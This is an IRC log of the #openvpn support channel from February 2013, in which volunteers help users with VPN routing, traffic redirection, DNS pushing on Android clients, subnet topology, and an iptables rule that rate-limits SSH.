YouTube (at www.youtube.com) 20:26 < qmr> Thanks rob0 20:27 < rob0> why no tun? 20:27 < qmr> hell if I know. this is an old almost forgotten about VPS. just noticed it has samba, bind, and apache installed. not sure if compromised or crappy template 20:28 < qmr> 2.6.32-042stab059.7 o_O 20:28 < rob0> Some VPSs have crappy custom kernels without modules. 20:29 < rob0> (made by people who had no idea you'd want such a thing, most likely) 20:29 < qmr> the provider's FAQ says it's enabled on all plans or whatever -_- 20:30 < pekster> Say what's embedded? CONFIG_TUN in the kernel? 20:31 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 20:32 < qmr> not sure how I would see that. doesn't look like config is exposed in /proc/config.gz 20:32 < rob0> That sucks. 20:36 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 20:36 -!- zz_AsadH is now known as AsadH 20:36 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 20:36 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 20:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 20:49 < qmr> okies, opened a ticket with them. kind of curious how I have used 650MB of xfer since I never log in there ... hm 21:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:33 -!- Siner [~chatzilla@c-98-255-2-163.hsd1.ca.comcast.net] has joined #openvpn 21:37 < Siner> Hi, hopefully I'm not breaking etiquette or missing something obvious in the topic. I am attempting to help an Australian friend of mine (I am in the US) tunnel traffic. We tried originally just hosting a local FreeSSHd server on my machine and connecting via putty, but we kept running into problems. 21:37 < Siner> I now have an instance of OpenVPN hosted on a linode 21:37 < Siner> I've followed linodes guide to setting it up 21:37 < Siner> but I can't figure out for the life of me how I am supposed to connect and forward traffic through it. 21:38 < Siner> Most of the guides I find are related to actually setting up the OpenVPN server, but they seem to just gloss over how you connect. 21:38 < Siner> !welcome 21:38 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 21:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:40 < pekster> Siner: start here, with the official openvpn howto: 21:40 < pekster> !howto 21:40 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:41 < pekster> How you forward traffic depends on what exactlly your goal is. Are you trying to reach systems behind either one of the peers? Redirect all Internet-bound traffic across the VPN? etc. In effect: 21:41 < pekster> !goal 21:41 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:43 < Siner> Ah, goal (seems silly) is to redirect minecraft traffic to a US IP in an attempt to solve apparent one-way lag. His packets seem to reach the server instantly, but it takes ages for things to happen on his end. 21:43 < Siner> I suppose this could be accomplished by redirecting all internet traffic across the VPN 21:44 < pekster> You can route anything from a single host to the whole of the Internet across a tunnel; it's just a route that comes up/down with the VPN connection 21:45 < Siner> So we could do: AussiePC -> Linode -> Minecraft Server and vice versa? 21:45 < pekster> First you need a working tunnel where you can ping endpoints. From there you can push a route to whatever you're trying to expose on the server-side; you'll probably need NAT too if you're dealing with IPv4 private addresing, unless you have public IPs for the VPN range 21:46 < pekster> The howto I linked earlier will get you a working VPN, where you can ping. You must get that working first, or nothing else will work. Then, read about handling routes: 21:46 < pekster> !route 21:46 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 21:46 < Siner> You just blew my mind. I'll do some reading on the howto, and then maybe I can ask better/more specific questions if I'm still having problems. Thanks for your help and patience. 22:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 22:44 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 22:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] --- Day changed Mon Feb 11 2013 01:03 -!- b1rkh0ff [~b1rkh0ff@178.77.24.133] has quit [Read error: Operation timed out] 01:03 -!- gedO [~quassel@88.119.154.240] has joined #openvpn 01:19 -!- b1rkh0ff [~b1rkh0ff@178.77.7.226] has joined #openvpn 01:39 -!- gedO_ [~quassel@88.119.154.240] has joined #openvpn 01:39 -!- gedO [~quassel@88.119.154.240] has quit [Ping timeout: 252 seconds] 01:49 -!- gedO_ [~quassel@88.119.154.240] has quit [Ping timeout: 276 seconds] 01:56 -!- gedO [~quassel@2002:5877:9af0:1000:3978:6c96:5f0b:5e20] has joined #openvpn 02:41 -!- yavor is now known as y4h0 03:14 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:19 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:19 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 03:20 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 03:22 -!- tMobile4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 03:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:23 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 03:26 -!- TheLaw [~law@irc.l4w.info] has quit [Ping timeout: 276 seconds] 03:26 -!- Siner [~chatzilla@c-98-255-2-163.hsd1.ca.comcast.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 03:38 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 03:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:48 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 03:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:50 -!- mode/#openvpn [+o krzee] by ChanServ 03:56 -!- dazo_afk is now known as dazo 04:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 04:04 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:53 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 05:00 -!- ade_b [~Ade@195.198.34.212] has joined #openvpn 05:00 -!- ade_b [~Ade@195.198.34.212] has quit [Changing host] 05:00 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 05:19 -!- william_ [~x@lotus.redl8.com] has quit [Ping timeout: 256 seconds] 05:39 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 05:50 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 05:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:02 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 06:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 06:05 -!- ParkerJ [~Parker@194.81.239.72] has joined #openvpn 06:09 < ParkerJ> Hello all. I have openvpn set up so users can access a bzr server. Now I'd like to allow the users to use gobby (a collaborative editor) but they can't ping each other via their vpn IPs. What part of the config do I need to change? 06:09 < ParkerJ> Thanks for any tips. 06:13 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 06:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 06:14 -!- william_ [~x@lotus.redl8.com] has joined #openvpn 06:14 < ParkerJ> server.conf http://pastebin.com/kG05FNwN 06:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:17 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has joined #openvpn 06:18 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 246 seconds] 06:20 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 06:22 -!- hg_5__ [~chatzilla@91.234.245.245] has joined #openvpn 06:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 06:25 -!- cpm_ [~Chip@50.149.28.79] has joined #openvpn 06:25 -!- cpm_ [~Chip@50.149.28.79] has quit [Changing host] 06:25 -!- cpm_ [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 06:26 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 260 seconds] 06:39 < ParkerJ> !welcome 06:39 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 06:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 06:40 < ParkerJ> !redirect 06:40 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 06:40 <@vpnHelper> http://ircpimps.org/redirect.png 06:45 -!- cpm_ [~Chip@pdpc/supporter/active/cpm] has quit [Ping timeout: 245 seconds] 06:46 < ParkerJ> !def1 06:46 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 06:47 < ParkerJ> !ipforward 06:47 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 06:48 < ParkerJ> !route 06:48 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 06:58 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has quit [Remote host closed the connection] 07:03 -!- master_of_master [~master_of@p57B547BB.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 07:05 -!- master_of_master [~master_of@p57B52D17.dip.t-dialin.net] has joined #openvpn 07:11 < ParkerJ> I think I have found what I was looking for: client-to-client Waiting for another client to turn up so I can try it out. 07:38 < sam1> any reason for tls error when using tls auth in windows? server is running debian, it works fine from linux and mac osx, but not windows 7 (client that is) 08:11 -!- Holiday [~rjr162@128.118.15.39] has quit [Quit: Leaving] 08:11 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 08:13 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 245 seconds] 08:26 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 252 seconds] 08:55 -!- nickanderson_afk is now known as nickanderson 08:59 -!- nickanderson is now known as nickanderson_afk 09:02 -!- gedO_ [~quassel@88.119.154.240] has joined #openvpn 09:04 -!- Cybert1nus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 09:05 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 09:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-bycvgppbjdznazft] has quit [Disconnected by services] 09:06 -!- con3x_ [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 09:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-qvzgpuzezirigqrs] has joined #openvpn 09:07 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 09:07 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 09:07 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has quit [Ping timeout: 276 seconds] 09:07 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 276 seconds] 09:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 276 seconds] 09:07 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 276 seconds] 09:07 -!- sitaktif [~sitaktif@kollok.org] has quit [Ping timeout: 276 seconds] 09:07 -!- gedO [~quassel@2002:5877:9af0:1000:3978:6c96:5f0b:5e20] has quit [Ping timeout: 276 seconds] 09:07 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 09:07 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Ping timeout: 276 seconds] 09:07 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 276 seconds] 09:07 -!- con3x [~pkinnaird@kobol.geeksoc.org] has quit [Ping timeout: 276 seconds] 09:07 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn 09:07 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 09:07 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 09:07 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Remote host closed the connection] 09:07 -!- dxtr [~dxtr@2001:470:28:93::cb] has joined #openvpn 09:07 -!- dxtr [~dxtr@2001:470:28:93::cb] has quit [Changing host] 09:07 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 09:07 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 09:07 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host] 09:07 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:07 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 09:07 -!- neilhwatson1 [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 09:07 -!- zz_AsadH is now known as AsadH 09:07 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 09:07 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 09:07 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 09:08 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 09:10 -!- AsadH is now known as zz_AsadH 09:10 -!- hg_5__ [~chatzilla@91.234.245.245] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 09:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:12 -!- kirin` [telex@gateway/shell/anapnea.net/x-qvzgpuzezirigqrs] has quit [Ping timeout: 252 seconds] 09:13 -!- kirin` [telex@gateway/shell/anapnea.net/x-ywbpjkygyhlnqciv] has joined #openvpn 09:15 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 09:15 < xtz> hey guys 09:16 < xtz> any1 with experience with the android client? 09:16 <@dazo> xtz: which version of it? 09:17 < xtz> latest - 1.1.9 09:17 < xtz> I have a very weird issue which might not be related to android's client only 09:18 < xtz> Im pushing DNS servers from my server with: 09:18 < xtz> push "dhcp-option DNS x.x.x.x" 09:18 < xtz> when DNS fallback is not checked on the client - it's using the x.x.x.x nameserver and everything is perfect 09:19 -!- kirin` [telex@gateway/shell/anapnea.net/x-ywbpjkygyhlnqciv] has quit [Ping timeout: 256 seconds] 09:19 < xtz> when DNS Fallback is checked though, it tries to use Google's DNS servers which means x.x.x.x is not pushed to the client... and I wonder why :\ 09:19 <@dazo> xtz: there are a brazillion android clients in Google Play ... I meant: which of them? ... "OpenVPN for Android", "OpenVPN Connect", etc ,etc 09:19 < xtz> openvpn connect :) 09:19 <@dazo> ahh, okay 09:19 < xtz> dazo: sorry didnt get ur question 09:20 <@dazo> novaflash: ^^^ this is probably your table :) 09:20 <@novaflash> hi dazo 09:20 <@novaflash> what's that hat on your head? 09:20 <@dazo> it means, look on the text above ... 09:20 <@novaflash> i need new glasses. looks like a santa hat 09:20 -!- kirin` [telex@gateway/shell/anapnea.net/x-ftxnbxlnnvfgtfqf] has joined #openvpn 09:20 <@dazo> s/ on / at / 09:21 <@novaflash> well 09:21 <@novaflash> as far as i understand it 09:21 <@novaflash> DNS fallback is meant to do exactly that 09:21 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 252 seconds] 09:22 < xtz> According to the description of the option 09:22 <@novaflash> yes, i know 09:22 <@novaflash> but it's an override 09:22 < xtz> 'Use Google DNS servers as a fallback for connections that route all internet traffic through the VPN tunnel but don't define any VPN DNS servers' 09:23 < xtz> I do route all the traffic but I define DNS servers too 09:23 <@novaflash> right, but you read it to mean that there is a logic involved that does an "if not dns server defined use google dns" 09:23 <@novaflash> but instead it's just an on/off for forcing google dns servers 09:23 < xtz> Alright, thanks :-) 09:23 <@novaflash> for those situations where people are using access servers that route all internet traffic through the vpn tunnel but where the access server does not define a vpn dns server 09:23 < xtz> saved me some debugging hrs :p 09:23 <@novaflash> :) 09:23 <@novaflash> it's not a bug 09:23 <@novaflash> it's a feature! 09:24 <@novaflash> for real, this time 09:24 <@novaflash> it's kind of strange though 09:24 <@novaflash> because by default when you set access server to redirect 09:24 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 09:24 <@novaflash> you are forced to define dns servers 09:24 <@novaflash> but sometimes people do override to disable that for some reason 09:25 -!- mode/#openvpn [+v EugeneKay] by ChanServ 09:25 <@novaflash> oh no it's EugeneKay 09:25 * novaflash flees like a shadow before the candlelight 09:26 <+EugeneKay> Pffft, I haven't gone wild with power yet 09:26 -!- kirin` [telex@gateway/shell/anapnea.net/x-ftxnbxlnnvfgtfqf] has quit [Ping timeout: 255 seconds] 09:26 < xtz> In my case I've set PF to allow DNS traffic only to my ISPs DNS servers (I tend to get a nice & tidy footprint on my uplink bw) and since it was trying Google's servers - traffic got blocked 09:26 <@novaflash> ah 09:27 <@novaflash> there is also a nasty thing you could do 09:27 -!- kirin` [telex@gateway/shell/anapnea.net/x-oxabjblalztgmmzr] has joined #openvpn 09:27 <@novaflash> and implement iptables rule for tcp and udp 53 ports to redirect all dns queries through the vpn tunnel to a local dns server or whatever dns server you like 09:27 <@novaflash> that's a dirty trick tho 09:27 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 09:27 <@novaflash> but it works 09:28 <@novaflash> i have no idea why you would want to do that 09:28 <@novaflash> but there it is 09:29 < xtz> OpenBSD and PF here, but yeah - I get the idea :-) 09:30 <@novaflash> oh yes pf then 09:31 < xtz> alright, thanks for your help 09:32 <@novaflash> this concludes our transaction. your soul is now mine. 09:32 -!- kirin` [telex@gateway/shell/anapnea.net/x-oxabjblalztgmmzr] has quit [Ping timeout: 252 seconds] 09:33 -!- kirin` [telex@gateway/shell/anapnea.net/x-bajfxcpaakpncqer] has joined #openvpn 09:34 < xtz> erm... alright, but Im afraid that traffic is blocked by PF as well 09:34 <@novaflash> sysadmins.. the worst kind! okay i'll go harvest some souls elsewhere 09:35 < xtz> and I'll go hom to get some sleep before the gym 09:36 < xtz> take care 09:36 <@novaflash> adios 09:36 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:39 -!- kirin` [telex@gateway/shell/anapnea.net/x-bajfxcpaakpncqer] has quit [Ping timeout: 245 seconds] 09:40 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 09:41 -!- kirin` [telex@gateway/shell/anapnea.net/x-fqcxzfjrwhmymqfg] has joined #openvpn 09:50 <@plaisthos> novaflash: :) 09:51 -!- neilhwatson1 is now known as help 09:51 -!- help is now known as neilhwatson 09:52 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 09:52 <@novaflash> hi plaisthos 09:52 <@plaisthos> No DNS servers being used. Name resolution may not work. Consider setting custom DNS Servers 09:52 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 09:53 <@plaisthos> is my warning for this kind of cases :) 09:53 <@novaflash> i wonder if openvpn connect has such a warning built in 09:54 <@novaflash> i'm guessing not 10:07 -!- ade_b [~Ade@host-78-65-176-141.homerun.telia.com] has joined #openvpn 10:07 -!- ade_b [~Ade@host-78-65-176-141.homerun.telia.com] has quit [Changing host] 10:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:14 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 10:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:26 -!- gedO_ [~quassel@88.119.154.240] has quit [Read error: Connection reset by peer] 10:36 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 10:38 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 246 seconds] 10:38 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 10:43 -!- ParkerJ [~Parker@194.81.239.72] has quit [Quit: Leaving] 10:44 -!- [fred] [fred@konfuzi.us] has joined #openvpn 10:46 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 10:46 < Holiday> So in TAP mode you can set the server-bridge to set the IP of the openvpn "server/bridge" to whatever you want (say .88.126) and the client range as well (88.127-.145), but with the TUN mode server option you're pretty much stuck with a 88.0/24 with the server taking 88.1? 10:50 <@novaflash> Holiday: i think you can use any CIDR notation acceptable range 10:51 <@novaflash> but the general idea is that you have a subnet that the vpn clients and the vpn server are all on and the vpn server ip on that subnet serves as the gateway, and that would be the first ip yes 10:51 <@novaflash> but 88.10.20.128/28 works fine too 10:52 <@novaflash> in TAP mode you don't need a gateway IP for the vpn subnet because it's a bridge 10:54 <@novaflash> but yeah server-bridge does define the ip for the openvpn server and yeah it is all open and free and easy to use 10:54 < rob0> "--server x.x.88.0 255.255.255.0" assigns x.x.88.1 to the server. But --server is a macro. You can use all the component parts of it, including --ifconfig, and set the IP you want. 10:54 < Holiday> ah okay nice 10:54 <@novaflash> all hail rob0 10:56 < Holiday> I must have missed that part of the MAN file (not hard to do as you get a tons of options!) 10:57 <@novaflash> there's a man file? 10:58 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:58 < Holiday> i suppose not many that hit up the channel RTFM, But I've tried :) (and about every site google ever has indexed) 10:59 <@novaflash> cool 11:01 -!- paccer [uid4847@gateway/web/irccloud.com/x-txhaywlkhsotevex] has joined #openvpn 11:08 -!- samba35 [~shrikant@unaffiliated/samba35] has joined #openvpn 11:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:13 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 11:14 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 11:15 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 11:16 < troker> Hey all - could anyone point me in the right direction for configuring a "server-only" connection with OpenVPN? -- I would like to have multiple services available to all clients on the VPN, but only the VPN port open on the actual physical interface. 11:19 <@krzee> !sample 11:19 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 11:20 <@krzee> troker, ^ 11:21 < troker> krzee: I guess my question was more about the logistics of setting up services to listen on the openvpn interface. 11:21 < troker> or am I missing something here? 11:22 <@krzee> logistics? 11:22 <@krzee> tell the app what ip to bind to 11:22 < troker> Will that cause issues when the openvpn server is not running? 11:24 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 11:24 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 11:24 -!- mode/#openvpn [+v hazardous] by ChanServ 11:25 <@krzee> …yes… it wont work 11:26 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 11:26 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 11:29 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving] 11:31 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:31 -!- mode/#openvpn [+o krzee] by ChanServ 11:36 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:46 < fys> fail2ban is quite powerful 11:46 < fys> heh 11:47 -!- samba35 [~shrikant@unaffiliated/samba35] has quit [Quit: Leaving] 12:02 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn 12:10 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 12:13 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 12:17 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 12:24 <+EugeneKay> iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 12:25 <+EugeneKay> All of the log spam reduction, none of the background processes 12:25 <+EugeneKay> And it works on IPv6, too 12:26 <@krzee> !fail2ban in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 12:26 <@krzee> err 12:26 <@krzee> !learn fail2ban as in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 12:26 <@vpnHelper> Joo got it. 12:26 <+EugeneKay> ;-) 12:26 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Read error: Connection reset by peer] 12:27 <@krzee> =] 12:27 <+EugeneKay> It's fairly crude, but damn if it don't work right 12:27 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 12:30 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:38 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:48 < Holiday> if I'm setting up the --server script manually would it be better to use net30 or subnet (or does it matter) for the VPN "server ip" network to be .128/28 as mentioned above? (This is pretty much going to be OS X and Windows clients) 12:51 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 12:56 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds] 12:57 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:57 -!- Devastator [~devas@177-069-161-045.static.ctbctelecom.com.br] has joined #openvpn 12:57 -!- troker_ [~troker@129.63.254.84] has joined #openvpn 12:57 -!- troker_ [~troker@129.63.254.84] has quit [Remote host closed the connection] 12:58 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Read error: Connection reset by peer] 12:58 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 13:01 -!- Devastator [~devas@177-069-161-045.static.ctbctelecom.com.br] has quit [Changing host] 13:01 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 13:11 -!- ade_b [~Ade@host-78-65-176-141.homerun.telia.com] has joined #openvpn 13:11 -!- ade_b [~Ade@host-78-65-176-141.homerun.telia.com] has quit [Changing host] 13:11 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 13:15 -!- zz_AsadH is now known as AsadH 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:28 <+EugeneKay> subnet. 13:28 <+EugeneKay> /30 is a legacy hack for Windows clients 13:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:31 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 13:33 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds] 13:40 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 13:43 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 13:44 -!- cek [~cek@crius.pantheon.fused.net] has quit [Read error: Operation timed out] 13:45 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn 13:50 < Holiday> EugeneKay: Thanks! 13:52 -!- cek [~cek@crius.pantheon.fused.net] has quit 